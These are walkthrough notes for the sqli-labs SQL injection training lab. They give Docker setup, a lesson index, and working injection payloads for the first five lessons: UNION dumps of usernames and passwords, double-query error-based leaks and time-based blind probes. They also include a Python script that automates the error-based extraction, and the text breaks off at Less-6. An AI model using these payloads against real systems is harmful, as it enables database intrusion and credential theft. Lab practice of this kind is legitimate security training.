sqli-labs walkthrough notes
Docker setup
Run: docker info  // shows Docker's status; confirm the daemon is up before going on
Search for the image: docker search sqli-labs
Pull the image: docker pull acgpiano/sqli-labs
List local images: docker images
Run the image: docker run -dt --name sqli -p 80:80 --rm acgpiano/sqli-labs (flags: -d runs the container in the background and -t allocates a pseudo-TTY; --name names the container; -p 80:80 maps the host port on the left to the container port on the right; --rm removes the container when it stops)
docker ps -a lists all containers with their ID, image, command, ports and so on
docker container ls shows only the containers that are currently running
sqli-labs walkthrough
- Page-1 (Basic Challenges)
- Less-1 GET - Error based - Single quote string
- Less-2 GET - Error based - Integer
- Less-3 GET - Error based - Single quote with a twist (parenthesis) string
- Less-4 GET - Error based - Double quote string
- Less-5 GET - Double query - Single quote string
- Less-6 GET - Double query - Double quote string
- Less-7 GET - Dump into outfile - String
- Less-8 GET - Blind - Boolean based - Single quote
- Less-9 GET - Blind - Time based - Single quote
- Less-10 GET - Blind - Time based - Double quote
- Less-11 POST - Error based - Single quote string
- Less-12 POST - Error based - Double quote string with a twist
- Less-13 POST - Double query - Single quote with a twist
- Less-14 POST - Double query - Double quote with a twist
- Less-15 POST - Blind - Boolean/time based - Single quote
- Less-16 POST - Blind - Time based - Double quote with parenthesis
- Less-17 POST - Update query - Error based
- Less-18 POST - Header injection - User-Agent - Error based
- Less-19 POST - Header injection - Referer - Error based
- Less-20 POST - Cookie injection - Error based
- Page-2 (Adv Injections)
- Less-21 Cookie Injection - Error Based - complex - string
- Less-22 Cookie Injection - Error Based - Double Quotes - string
- Less-23 GET - Error based - strip comments
- Less-24 Second Degree Injections *Real treat* - Stored Injections (second-order injection)
- Less-25 Trick with OR & AND (or and and are filtered)
- Less-25a
- Less-26 Trick with comments and space (comments and spaces are filtered)
- Less-26a GET - Blind Based - All your SPACES and COMMENTS belong to us
- Less-27 GET - Error Based - All your UNION & SELECT belong to us
- Less-27a GET - Blind Based - All your UNION & SELECT belong to us
- Less-28 GET - Error Based - All your UNION & SELECT belong to us - String - Single quote with parenthesis
- Less-28a GET - Blind Based - All your UNION & SELECT belong to us - String - Single quote with parenthesis
- Less-29 GET - Error based - with a WAF in front
- Less-30 GET - Blind - Having a WAF
- Less-31 Protection with WAF
- Less-32 Bypass addslashes()
- Less-33 Bypass addslashes()
- Less-34 Bypass Add SLASHES
- Less-35 why care for addslashes()
- Less-36 Bypass MySQL Real Escape String
- Less-37 MySQL_real_escape_string
- Page-3 (Stacked Injections)
- Less-38 GET - Stacked Query Injection - String
- Less-39 GET - Stacked Query Injection - Integer based
- Less-40 GET - BLIND based - String - Stacked
- Less-41 GET - BLIND based - Integer - Stacked
- Less-42 POST - Error based - String - Stacked
- Less-43 POST - Error based - String - Stacked with twist
- Less-44 POST - Error based - String - Stacked - Blind
- Less-45 POST - Error based - String - Stacked - Blind
- Less-46 GET - Error based - Numeric - ORDER BY CLAUSE
- Less-47 GET - Error based - String - ORDER BY CLAUSE
- Less-48 GET - Error based - Blind - Numeric - ORDER BY CLAUSE
- Less-49 GET - Error based - String - Blind - ORDER BY CLAUSE
- Less-50 GET - Error based - ORDER BY CLAUSE - numeric - Stacked injection
- Less-51 GET - Error based - ORDER BY CLAUSE - String - Stacked injection
- Less-52 GET - Blind based - ORDER BY CLAUSE - numeric - Stacked injection
- Less-53 GET - Blind based - ORDER BY CLAUSE - String - Stacked injection
- Page-4 (Challenges)
- Less-54 GET - challenge - Union - 10 queries allowed - Variation 1
- Less-55 GET - challenge - Union - 14 queries allowed - Variation 2
- Less-56 GET - challenge - Union - 14 queries allowed - Variation 3
- Less-57 GET - challenge - Union - 14 queries allowed - Variation 4
- Less-58 GET - challenge - Double Query - 5 queries allowed - Variation 1
- Less-59 GET - challenge - Double Query - 5 queries allowed - Variation 2
- Less-60 GET - challenge - Double Query - 5 queries allowed - Variation 3
- Less-61 GET - challenge - Double Query - 5 queries allowed - Variation 4
- Less-62 GET - challenge - Blind - 130 queries allowed - Variation 1
- Less-63 GET - challenge - Blind - 130 queries allowed - Variation 2
- Less-64 GET - challenge - Blind - 130 queries allowed - Variation 3
- Less-65 GET - challenge - Blind - 130 queries allowed - Variation 4
- END
Page-1 (Basic Challenges)
Less-1 GET - Error based - Single quote string
/?id=1
Renders normally.
/?id=1'
Returns an error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
The fragment near ''1'' LIMIT 0,1' shows that the parameter is wrapped in single quotes and followed by LIMIT 0,1, so a single quote breaks out of the string and --+ comments out the rest (the + decodes to the space that MySQL's -- comment requires):
/?id=1' --+
Determine the number of columns:
?id=1' order by 4 --+
order by 3 renders normally and order by 4 errors, so the query returns 3 columns.
Find which columns are echoed on the page:
?id=1' and 1=2 union select 1,2,3 --+
and 1=2 suppresses the real row so that the UNION row is what gets displayed; the values in positions 2 and 3 show up on the page.
?id=1' and 1=2 union select 1,database(),3 --+
Current database: security
List the tables in security:
?id=1' and 1=2 union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema='security')--+
List the columns of the users table (add and table_schema='security' if another schema also has a table called users):
?id=1' and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users') --+
Dump the usernames and passwords:
?id=1' and 1=2 union select 1,(select group_concat(password) from security.users) ,(select group_concat(username) from security.users) --+
Less-2 GET - Error based - Integer
?id=1' --+ errors: the parameter is inserted into the query unquoted, so there is no quote to close and the stray one breaks the syntax.
Proceed as in Less-1, but without any quote in the payload:
?id=1 and 1=2 union select 1,(select group_concat(password) from security.users) ,(select group_concat(username) from security.users)
Less-3 GET - Error based - Single quote with a twist (parenthesis) string
?id=1' --+ errors; the error message shows the parameter wrapped as ('1'), so close it with ') --+ instead.
Then query the column count, tables and column names as in Less-1.
Column count (still three):
?id=1') order by 4--+
Find the echoed columns:
?id=1') and 1=2 union select 1,2,3 --+
Current database:
?id=1') and 1=2 union select 1,database(),3--+
Tables in security:
?id=1') and 1=2 union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema='security')--+
Columns of users:
?id=1') and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users') --+
Dump:
?id=1') and 1=2 union select 1,(select group_concat(password) from security.users) ,(select group_concat(username) from security.users) --+
Less-4 GET - Error based - Double quote string
A double quote errors while a single quote does not, and ?id=1") --+ renders normally, so the parameter is wrapped as ("1"). Close with ") --+ and repeat the steps above.
Less-5 GET - Double query - Single quote string
Less-5 no longer echoes query results on the page (a valid id only prints "You are in..."), so the data has to come out through an error message. This uses the count(*) / group by / floor(rand()*2) "double query" trick.
Reference: http://www.2cto.com/article/201303/192718.html
In short: the query groups by a key built from concat(<subquery>, floor(rand()*2)). MySQL evaluates rand() once when it looks the key up in the temporary grouping table and again when it inserts it, so the same key can be inserted twice and MySQL throws "Duplicate entry '...' for key 'group_key'". The duplicate key contains the subquery's result, which is how one value per request leaks into the error text. With rand(0) the sequence of floor values is fixed and the duplicate is guaranteed once the source table has at least three rows; with unseeded rand(), as used below, the collision only happens with some probability, so repeat the request if the page comes back without an error.
?id=1' order by 4--+
Column count: still 3.
1' union all select count(*),2,concat( '~',(select schema_name from information_schema.schemata limit 4,1),'~',floor(rand()*2)) as a from information_schema.schemata group by a %23
Step the offset in limit N,1 to list the schemas one per request; this one returns security. union all is used here, and %23 is the URL-encoded # comment.
1' union all select count(*),2,concat( '~',(select table_name from information_schema.tables where table_schema = 'security' limit 3,1),'~',floor(rand()*2)) as a from information_schema.schemata group by a %23
Tables: offset 3 gives users.
1' union all select count(*),1,concat( '~',(select column_name from information_schema.columns where table_name= 'users' limit 2,1),'~',floor(rand()*2)) as a from information_schema.schemata group by a %23
Walking the offset finds three columns; once the offset runs past the last column the subquery returns nothing and the page simply shows "You are in..." again.
1' union all select count(*),1,concat( '~',(select concat(id,username,password) from users limit 2,1),'~',floor(rand()*2)) as a from information_schema.schemata group by a %23
The rows come out one at a time through the same offset. Done.
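Because each request leaks exactly one value inside the error text, the Less-5 procedure is a loop over the limit offset plus a regex over the response. The code below is an added example, not part of the page or of sqli-labs: it builds the count(*)/group by payload from the lesson above (using rand(0) so that the duplicate-key error is deterministic rather than probabilistic), pulls the leaked value out of MySQL's "Duplicate entry" message, and walks the offset until the page stops erroring. `fetch` is a hypothetical callable that submits the payload and returns the response body; a simulated one with a constructed table list is included so that the block runs offline.

```python
import re

# MySQL's duplicate-key message, e.g. "Duplicate entry '~security~1' for key 'group_key'".
# The ~ markers come from the payload and delimit the leaked value.
LEAK_RE = re.compile(r"Duplicate entry '~(.*?)~[01]' for key")


def double_query_payload(subquery, close="'"):
    """Wrap a scalar subquery in the count(*) / group by / floor(rand(0)*2) construction.
    rand(0) is seeded, so the collision happens on every request (the page used unseeded rand())."""
    return (f"1{close} union all select count(*),2,"
            f"concat('~',({subquery}),'~',floor(rand(0)*2)) as a "
            f"from information_schema.schemata group by a #")


def extract_leak(page_text):
    """Return the value carried by the duplicate-key error, or None if the page did not error."""
    m = LEAK_RE.search(page_text)
    return m.group(1) if m else None


def walk_offsets(fetch, select_template, close="'", max_rows=50, retries=3):
    """Enumerate a result set one row per request by stepping 'limit {offset},1'.
    fetch(payload) -> response body. Each offset is retried so the loop also copes
    with an unseeded rand() that only collides some of the time."""
    rows = []
    for offset in range(max_rows):
        subquery = select_template.format(offset=offset)
        leak = None
        for _ in range(retries):
            leak = extract_leak(fetch(double_query_payload(subquery, close)))
            if leak is not None:
                break
        if leak is None:          # offset ran past the last row: the page no longer errors
            break
        rows.append(leak)
    return rows


def make_simulated_fetch(values):
    """Offline stand-in for the lab (hypothetical): answers as if the subquery were
    'select ... limit {offset},1' over `values`, with MySQL's error text on a hit."""
    def fetch(payload):
        i = int(re.search(r"limit (\d+),1", payload).group(1))
        if i < len(values):
            return f"Duplicate entry '~{values[i]}~1' for key 'group_key'"
        return "You are in..........."
    return fetch


if __name__ == "__main__":
    # Constructed table list, not pulled from a live target.
    fetch = make_simulated_fetch(["emails", "referers", "uagents", "users"])
    print(walk_offsets(fetch, "select table_name from information_schema.tables "
                              "where table_schema='security' limit {offset},1"))
```

MySQL truncates the key it prints in that error message, so stuffing a whole group_concat() into the subquery loses the tail of long results; stepping the offset one row at a time, as the page does, is the reliable way to get everything out.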
Time-based blind injection by hand (tedious to do manually; sqlmap or a small script is recommended):
A true condition delays the response, a false one does not.
Database name length:
?id=1' and if(length(database())=8,sleep(5),1)--+
Clear delay, so the database name is 8 characters long.
Database name:
?id=1' and if(left(database(),1)='s',sleep(5),1)--+
Clear delay, so the first character is s. Then extend the length argument of left(database(),N) by one and try candidate characters on the right-hand side; the correct guess delays. This ends with left(database(),8)='security'.
Table names:
?id=1' and if( left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' ,sleep(5),1)--+
Step the offset in limit N,1 to walk the tables; this produces users (offset 3).
Column names:
?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password' ,sleep(5),1)--+
(Adding table_schema=database() to that subquery keeps a users table from another schema out of the list, which is what makes the offsets shift.)
Values:
?id=1' and if(left((select password from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+
?id=1' and if(left((select username from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+
Note that = under the default collation is case-insensitive, so 'dumb' matches Dumb; compare with binary or ascii() if the exact case matters.
Less-6 GET - Double query - Double quote string
Method 1: error-based injection (explanation reposted from elsewhere)
What error-based injection is:
Error-based injection deliberately makes the database throw an error while the error message carries the result of a query along with it. This section introduces the technique and how it works.
The most widely circulated error-based payload:
select count(*),(floor(rand(0)